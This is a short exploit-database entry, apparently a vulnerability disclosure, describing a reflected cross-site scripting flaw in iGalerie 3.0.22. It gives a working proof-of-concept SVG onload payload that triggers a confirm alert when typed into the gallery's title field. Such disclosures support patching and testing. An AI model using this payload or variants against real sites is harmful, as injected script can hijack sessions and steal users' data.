id: 39219
date: 01/08/2024
title: iGalerie 3.0.22 Cross Site Scripting Vulnerability
author: tmrswrr
cves: 

# Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS 
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.igalerie.org/
# Version: 3.0.22
# Tested on: https://softaculous.com/demos/iGalerie



1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/
    
    Titre :  "><sVg/onLy=1 onLoaD=confirm(1)//

2 ) Write in titre your payload , after save will be see alert button.


#  0day.today [2024-01-15]  #